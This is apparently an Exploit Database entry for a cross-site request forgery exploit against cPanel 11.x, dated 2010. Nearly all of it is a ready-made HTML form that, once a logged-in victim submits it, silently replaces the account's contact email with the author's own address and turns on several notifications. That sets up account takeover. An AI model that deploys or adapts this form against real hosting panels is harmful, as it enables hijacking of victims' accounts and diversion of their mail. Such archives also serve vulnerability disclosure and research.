cPanel 11.x - Cross-Site Request Forgery (Edit E-mail)

EDB-ID:

15593

CVE:

N/A


Author:

Mon7rF .

Type:

webapps


Platform:

PHP

Date:

2010-11-21


# Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..